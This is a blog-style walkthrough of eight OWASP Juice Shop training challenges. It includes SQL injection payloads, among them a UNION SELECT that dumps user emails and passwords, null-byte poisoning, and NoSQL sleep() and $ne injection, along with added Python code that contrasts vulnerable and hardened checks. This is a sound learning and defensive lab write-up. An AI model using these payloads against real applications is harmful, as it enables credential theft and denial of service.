Hello!
Welcome to the second part of my web sec journey through Juice Shop four stars challenges!
Just to remind you, there are 24 ⭐⭐⭐⭐ challenges; I previously completed 8 of them, and today I’m planning to solve another 8 from the categories Injection, Sensitive Data Exposure, Security through Obscurity and Cryptographic Issues 😊 (that’s why I’m also tagging this one as #cryptoRelated!)
Let’s get down to hacking!
Goals
In the previous part, WebSec 101: JuiceShop ⭐⭐⭐⭐ challenges 1/3, I managed to solve 8 challenges from the categories Injection, Sensitive Data Exposure, Broken Access Control and Improper Input Validation. There are 16 challenges left:
- Sensitive Data Exposure – 3
- XSS – 3
- Injection – 3
- Vulnerable Components – 2
- Broken Authentication – 2
- Cryptographic Issues – 1
- Security through Obscurity – 1
- Unvalidated Redirects – 1
Today I’m willing to complete 8 of them in 4 categories:
- Sensitive Data Exposure – 3
- Injection – 3
- Security through Obscurity – 1
- Cryptographic Issues – 1
And my score board looks like:

Let’s go!
⭐⭐⭐⭐Leaked Unsafe Product (Sensitive Data Exposure)
In this first challenge we have to identify an unsafe product that was removed from the shop and inform the shop (via the contact form) which ingredients are dangerous. As a hint we know that our own SQLi and someone else’s Ctrl+V will be our accomplices in this challenge.
In the previous article, WebSec 101: JuiceShop ⭐⭐⭐⭐ challenges 1/3, we discovered in the Christmas Special challenge that some products are missing. Let’s try to enumerate all of them, but this time with SQLi. As we know from previous articles, for example WebSec 101: JuiceShop ⭐ challenges, the search query may be vulnerable. Let’s use it to list all of the products.
The intuitive request GET /rest/products/search?q='-- results in:
"message": "SQLITE_ERROR: incomplete input",
"sql": "SELECT * FROM Products WHERE ((name LIKE '%'--%' OR description LIKE '%'--%') AND deletedAt IS NULL) ORDER BY name"
As we can see, the WHERE clause (after our little cut, since -- comments out the rest of the line) looks like:
SELECT * FROM Products WHERE ((name LIKE '%'--
Two brackets are left open, so we need to close them with )) (double bracket ending) before the comment.
So with the request GET /rest/products/search?q='))--
the query becomes SELECT * FROM Products WHERE ((name LIKE '%')) with the deletedAt IS NULL filter commented out, and we receive the list of all products, including those previously missing (potentially unsafe):

The unsafe product is Rippertuer Special Juice. Sending Cherymoya Annona cherimola, Jabuticaba Myrciaria cauliflora, Bael Aegle marmelos… and the other strings does not solve the challenge, so I’ll google it.
It leads me to the Top 20 Fruits You Probably Don’t Know – Listverse page.
A simple comment there leads us to a pastebin (someone else’s Ctrl+V):

So we have to visit the Rippertuer Special Juice Ingredients pastebin, which looks like JSON:
(...)
"type": "Hueteroneel",
"description": "The manchineel is a round fruit about the size of a tangerine native to
Mexico and the Caribbean. It’s also known as the “beach apple” and can be quite tasty. It has reddish-greyish bark, small greenish-yellow flowers, and shiny green leaves.
The tree has been used as a source of timber by Caribbean carpenters for centuries.
It must be cut and left to dry in the sun to remove the sap.
Only a warning, this coupled with Eurogium Edule was sometimes found fatal,
though the reports are scarce.
A gum can be produced from the bark which reportedly treats edema,
while the dried fruits have been used as a diuretic."
(....)
So Hueteroneel together with Eurogium Edule are our unsafe ingredients!
After sending a comment containing both names, the challenge is solved 😊
⭐⭐⭐⭐Misplaced Signature File (Sensitive Data Exposure)
Now we have to deal with a misplaced SIEM signature file. To do that we need to ‘trick a security mechanism into thinking that the file you want to download has a valid type’.
Also, SIEM signature points to the Neo23x0/sigma GitHub repository, where we can read about SIGMA – Generic Signature Format for SIEM Systems:
Sigma is a generic and open signature format that allows you to describe relevant log events in a straightforward manner. The rule format is very flexible, easy to write and applicable to any type of log file. The main purpose of this project is to provide a structured form in which researchers or analysts can describe their once developed detection methods and make them shareable with others.
Sigma is for log files what Snort is for network traffic and YARA is for files.
What is Sigma – Neo23x0/sigma Github
Again, we have to go back to the ftp directory:

And download suspicious_errors.yml using Null Byte Poisoning, described in WebSec 101: JuiceShop ⭐⭐⭐⭐ challenges 1/3, which basically is:
http://127.0.0.1:3000/ftp/suspicious_errors.yml%2500.md
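Why the %2500 suffix fools a file-type check, as an added illustration (my own code, not Juice Shop’s): a naive check decodes the name once and only looks at the extension, while a file-serving layer that decodes once more stops at the NUL byte. The second decoding layer is an assumption used to model this class of bug, not a description of Juice Shop’s internals; the hardened check refuses names that are still percent-encoded or contain control characters after one decode.

```python
from urllib.parse import unquote

# Constructed allowlist for the ftp directory (assumption for this illustration)
ALLOWED_SUFFIXES = (".md", ".pdf")


def naive_allowed(requested_name):
    # Flawed check: decode the request once and only look at the suffix.
    # "suspicious_errors.yml%2500.md" decodes to "suspicious_errors.yml%00.md",
    # which ends with ".md", so it passes.
    return unquote(requested_name).endswith(ALLOWED_SUFFIXES)


def name_seen_by_file_server(requested_name):
    # Modelled downstream layer (assumption): decodes the already-decoded name
    # once more and, like a C-string path API, stops reading at the first NUL.
    decoded_twice = unquote(unquote(requested_name))
    return decoded_twice.split("\x00", 1)[0]


def hardened_allowed(requested_name):
    # Decode once, then refuse anything that is still percent-encoded (so no
    # later decoding pass can change the name we checked), contains control
    # bytes, or tries to leave the directory; only then compare the suffix.
    name = unquote(requested_name)
    if "%" in name or any(ord(c) < 0x20 for c in name):
        return False
    if ".." in name or "/" in name or "\\" in name:
        return False
    return name.endswith(ALLOWED_SUFFIXES)


if __name__ == "__main__":
    tricky = "suspicious_errors.yml%2500.md"
    print(naive_allowed(tricky))             # True: the check is fooled
    print(name_seen_by_file_server(tricky))  # suspicious_errors.yml
    print(hardened_allowed(tricky))          # False
```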
⭐⭐⭐⭐Nested Easter Egg (Cryptographic Issues)
This is the first (real) challenge that has anything to do with real crypto! Crypto, as you know, is what tigers like best, so let’s get down to it!
We have to apply some advanced cryptanalysis to find the real easter egg and peel through several layers of tough-as-nails encryption for this challenge. As we know from the previous part, the easter egg is hidden in the ftp dir. Here is its content:
"Congratulations, you found the easter egg!"
- The incredibly funny developers
...
...
...
Oh' wait, this isn't an easter egg at all!
It's just a boring text file!
The real easter egg can be found here:
L2d1ci9xcmlmL25lci9mYi9zaGFhbC
9ndXJsL3V2cS9uYS9ybmZncmUvcnR0
L2p2Z3V2YS9ndXIvcm5mZ3JlL3J0dA==
Good luck, egg hunter!
We have to investigate the L2d1ci9xcmlmL25lci9mYi9zaGFhbC9ndXJsL3V2cS9uYS9ybmZncmUvcnR0L2p2Z3V2YS9ndXIvcm5mZ3JlL3J0dA== string.
Looks like Base64! After decoding we receive: /gur/qrif/ner/fb/shaal/gurl/uvq/na/rnfgre/rtt/jvguva/gur/rnfgre/rtt – something that looks like a URL path.
Ok then. After checking it as a URL it’s not working, so it must be some sort of shift cipher!
I’ve decided to write an easy-peasy article about shift ciphers and decrypting this egg (step by step). You can find it here:
CryptoPy: Caesar Cipher aka Shift Cipher in Python – I strongly encourage you to give it a try 😉
…
After we find out it’s a ROT-13 cipher, we can easily decode it to: /the/devs/are/so/funny/they/hid/an/easter/egg/within/the/easter/egg
Visiting http://127.0.0.1:3000/the/devs/are/so/funny/they/hid/an/easter/egg/within/the/easter/egg solves the challenge!
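As an added example (not the author’s CryptoPy script), here is the whole peel in Python: the first layer is Base64, and instead of assuming ROT-13 the code tries all 26 shifts and keeps the one whose path segments look most like English, using a small constructed word list.

```python
import base64
import string

# The string from the "real easter egg" hint above
EGG = ("L2d1ci9xcmlmL25lci9mYi9zaGFhbC9ndXJsL3V2cS9uYS9ybmZncmUvcnR0"
       "L2p2Z3V2YS9ndXIvcm5mZ3JlL3J0dA==")

# Tiny constructed list of common English words used to score candidate shifts
COMMON_WORDS = {"the", "a", "an", "and", "are", "so", "is", "of", "within", "egg"}


def shift_text(text, k):
    # Caesar/shift cipher over ASCII letters; everything else passes through
    out = []
    for c in text:
        if c in string.ascii_lowercase:
            out.append(chr((ord(c) - ord("a") + k) % 26 + ord("a")))
        elif c in string.ascii_uppercase:
            out.append(chr((ord(c) - ord("A") + k) % 26 + ord("A")))
        else:
            out.append(c)
    return "".join(out)


def english_score(text):
    # Number of path segments that are plain English words
    return sum(seg.lower() in COMMON_WORDS for seg in text.split("/"))


def peel_egg(b64):
    # Layer 1: Base64. Layer 2: try all 26 shifts, keep the most English-looking.
    layer1 = base64.b64decode(b64).decode("ascii")
    best_k = max(range(26), key=lambda k: english_score(shift_text(layer1, k)))
    return layer1, best_k, shift_text(layer1, best_k)


if __name__ == "__main__":
    inner, k, path = peel_egg(EGG)
    print(inner)          # /gur/qrif/ner/fb/shaal/gurl/uvq/na/rnfgre/rtt/...
    print(k, path)        # 13 /the/devs/are/so/funny/they/hid/an/easter/egg/...
```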
⭐⭐⭐⭐NoSQL DoS (Injection)
Now we have to let the server sleep for some time! Great idea, everybody needs some rest from time to time 😉
Also, we know that this challenge is essentially a stripped-down Denial of Service (DoS) attack. So what is a DoS attack?
A denial-of-service (DoS) attack occurs when legitimate users are unable to access information systems, devices, or other network resources due to the actions of a malicious cyber threat actor. Services affected may include email, websites, online accounts (e.g., banking), or other services that rely on the affected computer or network. A denial-of-service condition is accomplished by flooding the targeted host or network with traffic until the target cannot respond or simply crashes, preventing access for legitimate users. DoS attacks can cost an organization both time and money while their resources and services are inaccessible.
Understanding Denial-of-Service Attacks – US National Cyber Awareness System
We also have a hint that it should be a NoSQL attack.
NoSQL databases provide looser consistency restrictions than traditional SQL databases. By requiring fewer relational constraints and consistency checks, NoSQL databases often offer performance and scaling benefits. Yet these databases are still potentially vulnerable to injection attacks, even if they aren’t using the traditional SQL syntax. Because these NoSQL injection attacks may execute within a procedural language, rather than in the declarative SQL language, the potential impacts are greater than traditional SQL injection.
NoSQL database calls are written in the application’s programming language, a custom API call, or formatted according to a common convention (such as XML, JSON, LINQ, etc). Malicious input targeting those specifications may not trigger the primarily application sanitization checks. For example, filtering out common HTML special characters such as < > & ; will not prevent attacks against a JSON API, where special characters include / { } : .
Testing for NoSQL injection – OWASP Testing Guide
So basically we will try to invoke the sleep(milliseconds) MongoDB method.
As we already discovered, there is a REST API which takes a {parameter} we can try to inject. One of them is e.g. GET /rest/products/1/reviews, mentioned in WebSec 101: JuiceShop ⭐⭐⭐ challenges 2/2, where 1 is our {parameter}.
After sending the GET /rest/products/sleep(1000)/reviews request we have to wait … before receiving the response, ’cause the server is napping 😴
⭐⭐⭐⭐NoSQL Manipulation (Injection)
NoSQL again, and we have to update multiple product reviews at the same time. We are advised to look closer at the Mongo equivalent of UPDATE.
Let’s try to investigate the reviews mechanism. Writing a review is a PUT request, PUT /rest/products/1/reviews, with body:
{"message":"nice one","author":"jim@juice-sh.op"}
Still, bear in mind that we injected our {parameter} as the {id} in the /rest/products/{id}/reviews request.
Changing a review, on the other hand, is a PATCH request, PATCH /rest/products/reviews, with body:
{"id":"yJHB2wg97AmmTbYpn","message":"nice two"}
So changing the review sends the id in the body!
NoSQL Injection is different from classic SQL Injection, so I decided to broaden my knowledge by reading the A NoSQL Injection Primer (with Mongo) – Null Sweep article.
There is a trick described there, where the author bypasses a login page with the simple $ne (not-equals) operator, like:
{"username":"myaccount","password":{"$ne": 1}}
With big credit to Charlie Belmer, I’ll try the same trick here! A PATCH /rest/products/reviews HTTP/1.1 request with body:
{"id": { "$ne": -1 },"message":"nice two"}
solves the challenge 😉 Because the id is no longer a single review id but a condition every review satisfies, the update hits all reviews at once.
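Both NoSQL challenges rely on the server forwarding whatever shape the client sends: sleep(1000) as the product id in the URL, and an {"$ne": -1} object instead of a review id string in the PATCH body. The added example below (my own code, not Juice Shop’s) shows the input validation that closes both; the id formats are constructed assumptions based on the values quoted in this post.

```python
import re

# Constructed formats (assumptions): product ids are small integers in the URLs
# above; the review id shape ("yJHB2wg97AmmTbYpn") is taken to be alphanumeric.
PRODUCT_ID = re.compile(r"\d{1,9}")
REVIEW_ID = re.compile(r"[A-Za-z0-9]{10,32}")


def contains_operator(value):
    # Recursively look for keys starting with '$' (e.g. {"$ne": -1}) in a parsed
    # JSON body; such objects turn a value comparison into a query operator.
    if isinstance(value, dict):
        return any(str(k).startswith("$") or contains_operator(v)
                   for k, v in value.items())
    if isinstance(value, list):
        return any(contains_operator(v) for v in value)
    return False


def valid_product_id(raw):
    # Path parameter for GET /rest/products/{id}/reviews: digits only, so an
    # expression such as sleep(1000) is rejected before any database call.
    return isinstance(raw, str) and PRODUCT_ID.fullmatch(raw) is not None


def valid_review_patch(body):
    # Body for PATCH /rest/products/reviews: id must be a plain string of the
    # expected shape, message a string, and no operator objects anywhere.
    if not isinstance(body, dict) or contains_operator(body):
        return False
    rid, msg = body.get("id"), body.get("message")
    return (isinstance(rid, str) and REVIEW_ID.fullmatch(rid) is not None
            and isinstance(msg, str))


if __name__ == "__main__":
    print(valid_product_id("1"), valid_product_id("sleep(1000)"))          # True False
    print(valid_review_patch({"id": "yJHB2wg97AmmTbYpn", "message": "nice two"}))  # True
    print(valid_review_patch({"id": {"$ne": -1}, "message": "nice two"}))        # False
```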
⭐⭐⭐⭐Reset Uvogin’s Password (Sensitive Data Exposure)
This one is tricky, because we have to reset Uvogin’s password via the Forgot Password mechanism with the original answer to his security question.
We know from the administration page that his mail is (what a surprise):
uvogin@juice-sh.op
With the Forgot Password form we can check that his security question is about his favourite movie:

We are advised to do some OSINT on social media.
Long story short, it turns out that Uvogin has the uv0gin Twitter account 😊 with only one post, related to Juice Shop:
I th0ugh7 I f1n4lly f0und a r3l1abl3 0nl1n3 st0r3 f0r b3v3rages.
Turn5 0ut 1t's m0r3 l1k3 a ch3ckl1st of
wh4t NOT t0 d0 wh3n bu1ld1n6 a s3cure app. 0 stars
Checking his Twitter account with the Wayback Machine shows us three snapshots; one of them (here) contains a very interesting (and deleted) tweet:

So answering Silence of the Lambs as the favourite movie solves the challenge!
⭐⭐⭐⭐Steganography (Security through Obscurity)
Steganography! Sounds mysterious… so what do we know about this art?
Steganography is the practice of concealing a file, message, image, or video within another file, message, image, or video. The word steganography combines the Greek words steganos (στεγανός), meaning “covered, concealed, or protected”, and graphein (γράφειν) meaning “writing”.
Steganography – Wikipedia
Now we have to rat out a notorious character hiding in plain sight in the shop (mention the exact name of the character), and no matter what, we will need some external tool.
To be honest, I didn’t know where to start, so I’ve checked more extensive hints…
They only pointed that ‘This challenge cannot be solved by just reading our “Lorem Ipsum”-texts carefully.’
Let’s try to find something odd in the images on this lorem ipsum page, which is About Us.
In the carousel below there are five pictures:

The only difference is that img 5 has a .PNG extension instead of .JPG.
But it looks perfectly normal, with no metadata:

But that’s the art of steganography…
One of the most interesting stego applications is OpenStego – a free steganography solution.
OpenStego provides two main functionalities:
Data Hiding: It can hide any data within a cover file (e.g. images).
Watermarking (beta): Watermarking files (e.g. images) with an invisible signature. It can be used to detect unauthorized file copying.
Introduction – Open Stego
OpenStego is able to extract some data from the file!

And we find that Pickle Rick from Rick and Morty solves the challenge!

⭐⭐⭐⭐User Credentials (Injection)
The last Injection is the icing on the cake!
We have to retrieve a list of all user credentials via SQL Injection. We are advised to gather information on where user data is stored and how it is addressed, and then craft a corresponding UNION SELECT – can’t wait!
As we’ve learned before, the search query (GET /rest/products/search?q=) is vulnerable to SQL injection. We know that the '))-- attack is working.
Let’s split it into simple steps:
- I’ll try with '))UNION SELECT * FROM X-- as the parameter… and boom 💣! "SQLITE_ERROR: no such table: X"
- Let’s try with the best guess, FROM Users… "SQLITE_ERROR: SELECTs to the left and right of UNION do not have the same number of result columns"
- WE ARE HOME! '))UNION SELECT '1' from Users-- results in the same error, '))UNION SELECT '1','2' from Users-- – same error,
- After a while… '))UNION SELECT '1','2','3','4','5','6','7','8','9' from Users-- – SUCCESS!
And the response with an extra element:
{
"id": "1",
"name": "2",
"description": "3",
"price": "4",
"deluxePrice": "5",
"image": "6",
"createdAt": "7",
"updatedAt": "8",
"deletedAt": "9"
}
Let’s be honest – we know this API very well and we could’ve counted the number of columns… We also know the column names we are looking for: id, email and password.
Now let’s craft a proper UNION SELECT – I’ll add qwerty at the beginning to cut off the products, and replace the column names:
qwerty')) UNION SELECT id, email, password, '4', '5', '6', '7', '8', '9' FROM Users--
Gives us a valid response:

And solves the challenge!
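Both SQLi steps in this post (the '))-- trick that lists deleted products and the UNION SELECT that dumps Users) come down to the same defect: the search term is concatenated into the SQL string. Below is an added example of my own (not Juice Shop’s code) that rebuilds the leaked query shape over a constructed in-memory SQLite database, runs both payloads against the concatenated version, and shows that the parameterised version treats them as plain search text. Table contents and the password hash are placeholders.

```python
import sqlite3


def build_db():
    # Constructed stand-in for the two tables used above; the Products column
    # order follows the 9-column response shown in the walkthrough.
    db = sqlite3.connect(":memory:")
    db.executescript("""
        CREATE TABLE Products(id, name, description, price, deluxePrice,
                              image, createdAt, updatedAt, deletedAt);
        CREATE TABLE Users(id, email, password);
        INSERT INTO Products VALUES (1, 'Apple Juice', 'fresh', 1.99, 1.49,
                                     'apple.jpg', '', '', NULL);
        INSERT INTO Products VALUES (2, 'Rippertuer Special Juice', 'Hueteroneel',
                                     16.99, 15.99, 'r.jpg', '', '', '2019-01-01');
        INSERT INTO Users VALUES (1, 'admin@juice-sh.op', 'HASH-PLACEHOLDER');
    """)
    return db


def search_vulnerable(db, q):
    # Query shape taken from the leaked error message; q is concatenated verbatim,
    # so a quote plus comment in q rewrites the WHERE clause and a UNION works.
    sql = (f"SELECT * FROM Products WHERE ((name LIKE '%{q}%' OR description LIKE '%{q}%') "
           f"AND deletedAt IS NULL) ORDER BY name")
    return db.execute(sql).fetchall()


def search_safe(db, q):
    # Same query with bound parameters: the wildcard pattern is built in Python
    # and passed as data, so quotes, comments and UNION in q are just characters.
    pattern = f"%{q}%"
    sql = ("SELECT * FROM Products WHERE ((name LIKE ? OR description LIKE ?) "
           "AND deletedAt IS NULL) ORDER BY name")
    return db.execute(sql, (pattern, pattern)).fetchall()


# Payloads quoted in the walkthrough
SHOW_DELETED = "'))--"
DUMP_USERS = ("qwerty')) UNION SELECT id, email, password, "
              "'4', '5', '6', '7', '8', '9' FROM Users--")

if __name__ == "__main__":
    db = build_db()
    print(search_vulnerable(db, SHOW_DELETED))  # both products, deleted one included
    print(search_vulnerable(db, DUMP_USERS))    # one row: id, email, password hash
    print(search_safe(db, SHOW_DELETED), search_safe(db, DUMP_USERS))  # [] []
```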
Conclusion
Scoreboard for another part of this competition: done & green!
I’m two-thirds through the four-star challenges and at 61% of the whole score board!
These 8 challenges were really fun – a lot of Injection (3 of them!), both SQLi and NoSQL, and also #crypto stuff, as well as stego 😀 Nice!
I really enjoy this journey and I really appreciate that it pushes me to write a simple script to decode the ROT-13 cipher (and a small article about it in the near future 😉) – it makes me grow faster!
CryptoPy: Caesar Cipher aka Shift Cipher in Python – check this out!
That’s it for today! I’m going for a nap (like the server did) and I hope you enjoyed this article!
If you have any questions do not hesitate to contact me!
Regards!
Reference list:
- Top 20 Fruits You Probably Don’t Know – Listverse page
- Rippertuer Special Juice Ingredients pastebin
- Neo23x0/sigma Github
- Understanding Denial-of-Service Attacks – US National Cyber Awareness System
- Testing for NoSQL injection – OWASP Testing Guide
- A NoSQL Injection Primer (with Mongo) – Null Sweep
- Steganography – Wikipedia
- Introduction – Open Stego